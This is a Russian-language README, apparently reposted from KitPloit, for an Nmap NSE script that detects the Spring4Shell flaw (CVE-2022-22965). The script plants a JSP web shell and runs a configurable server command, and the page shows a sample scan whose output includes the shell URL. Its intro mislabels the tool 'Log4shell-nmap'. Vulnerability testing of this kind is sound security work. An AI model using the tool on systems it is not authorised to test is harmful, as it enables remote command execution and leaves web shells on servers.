## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-GPIECHNIK2-NMAP-SPRING4SHELL
# Nmap-spring4shell
Log4shell-nmap — это NSE-скрипт для обнаружения уязвимостей Spring4Shell RCE (CVE-2022-22965) в HTTP-сервисах. Скрипт внедряет корректную полезную нагрузку (payload) в приложение, а затем выполняет следующую команду на указанном endpoint.
## Уязвимость
См. здесь.
## Использование
root@kitploit:~
┌──(kali㉿kali)-[~/nmap-spring4shell]
└─$ nmap 127.0.0.1 --script=./spring4shell.nse
(...)
PORT STATE SERVICE REASON VERSION
8080/tcp open http-proxy syn-ack
| spring4shell:
| VULNERABLE:
| Spring4Shell - Spring Framework RCE via Data Binding on JDK 9+
| State: VULNERABLE
| IDs: CVE:CVE-2022-22965
| Check results:
| 127.0.0.1:8080/shell.jsp?pwd=j&cmd=id
| Extra information:
| TESTED URL: 127.0.0.1:8080
| COMMAND: id
| ASSERTION: uid
| References:
|_ https://vulners.com/cve/CVE-2022-22965
## Аргументы
В скрипте можно использовать несколько переменных. Они следующие:
* `endpoint` — относительный URL. Для `https://bugspace.pl/search/videos` это будет `/search/videos`,
* `command` — команда, выполняемая на сервере. По умолчанию используется `id`,
* `assertion` — проверяемая строка в ответе сервера. По умолчанию используется `uid`,
* `filename` — имя файла на сервере. Для получения дополнительной информации см. здесь. По умолчанию используется `shell`.
## Дополнительные данные
Протестировано на приложении отсюда и отсюда
## Лицензия
Такая же, как у Nmap. См. https://nmap.org/book/man-legal.html